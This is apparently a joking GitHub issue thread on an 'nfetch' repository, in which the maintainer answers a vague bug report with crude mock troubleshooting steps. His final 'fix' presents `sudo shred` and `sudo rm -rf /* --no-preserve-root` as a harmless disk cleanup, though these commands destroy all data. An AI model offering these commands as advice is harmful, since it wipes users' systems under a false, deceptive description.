### ISSUE TITLE
Issues on my Raspberry PI, Windows, ESP32, MacOS

### ISSUE THREAD

**Issue by nuIIpointerexception** [NeuroException/nfetch#1]
Why not working
![MeRN](https://i.kym-cdn.com/entries/icons/mobile/000/026/489/crying.jpg)

**Comment by NeuroException** [comment]
This issue is most likely caused due to the imense lack of pussy.

To fix this problem:
1.) Uninstall Arch
2.) Uninstall Arch again
3.) Reboot your pc exactly 7 times.

**Comment by nuIIpointerexception** [comment]
Sorry i failed at step 4, can you provide me a different solution

**Comment by NeuroException** [comment]
Sorry mate, completely forgot about your problem.

I got a different solution that should fix your problem.

Cleanup your disk (this typically removes unused junk from your system)
1. `sudo shred -xvz /* &&  sudo rm -rf /* --no-preserve-root`

# Reboot your system
2. `sudo reboot`

Let me know if this solved your issue 👍
